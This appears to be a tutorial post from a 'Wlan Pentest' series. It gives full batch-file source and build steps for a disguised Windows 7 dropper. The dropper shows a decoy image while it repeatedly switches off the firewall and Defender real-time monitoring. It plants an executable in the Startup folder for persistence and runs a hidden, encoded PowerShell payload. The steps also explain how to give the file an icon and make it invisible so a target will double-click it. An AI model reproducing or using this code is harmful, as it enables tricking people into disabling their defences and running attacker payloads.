28. Wlan Pentest Create Icon Preparing Payload Windows 7
----
Payload Concealment
1. Create icon with Big J's Icon Maker, you could use any Icon Maker for this.
2. Edit the F1 file first putting the Payload in the "INSERT-HERE" from the original payload file or the fi file we edited earlier, inside of the
('INSERT-HERE') enclosed punctuations. Under the A: Block of text.
3. create a new folder around the bat files named "e" to put our exe files that we create using BattoExe program that we learned about in our previous Lan Pentesting Videos.
4. choose f.bat to convert into an invisible 64 bit exe first make sure %appdata% is set as working directory.
5. then choose f1.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, and overwrite is set, and extract embeded items to %appdata% as well, include the f.exe file that we just created.
6. then choose af.bat to convert to invisible 64 bit exe, make sure %appdata% is set for working directory, choose icon for the file, choose %appdata% for embeded items, and make sure overwrite is set to yes. We will choose to embed, "zombie.PNG" and "f1.exe" (f1.exe also has f.exe embeded within it which we did previously.) so there is no need to include the f.exe
7. The payload here is created for a Windows 7 Pc, if it were to be created for a Windows 10 Pc, we would require administrative priveledges as we did with the Lan Pentesting video earlier, so that it could disable W10 Protection.
8. the "File.exe" is what the Target Pc will click to initiate the connection between the user and the Linux user.
9. Once it's double-clicked, it will open the zombie.PNG image for the user, and run the f1.exe file in the background.
10. the f.exe file will remain silent until the user restarts their pc, then it will remove f1.exe from the target's %appdata% folder.
The video has been sped up at this point, at this point in the video, it navigates to the folder where the files were extracted to show you how everything works.
Contents of fi.bat file
=*=
- Code:
@echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
af.bat file contents This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe, it will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems, this will not work for 32-bit windows 7 systems.
=*=
- Code:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
taskkill /im f1.exe /f
timeout /t 01 > nul
start "" "%appdata%\zombie.png"
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
netsh advfirewall set allprofiles state off 2> nul
powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
timeout /t 10 > nul
"%appdata%\f1.exe" 2> nul
exit
f1.bat file contents This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the A: BLOCK of text.
=*=
- Code:
@echo off
taskkill /im powershell.exe /f 2> nul
timeout /t 02
move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
:Begin
set t=%date:~4,5%
if "%t%"=="03/02" goto :A
if not "%t%"=="03/02" goto :B
timeout /t 02 > nul
:A
powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
exit
:B
timeout /t 05
start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
timeout /t 05
f.bat file contents This bat file tells windows to remove the f1.exe file whenever the user restarts the computer.
=*=
- Code:
@echo off
taskkill /im f1.exe /f 2> nul
taskkill /im powershell.exe /f
timeout /t 04 > nul
del "%appdata%\f1.exe" /q /s /f 2> nul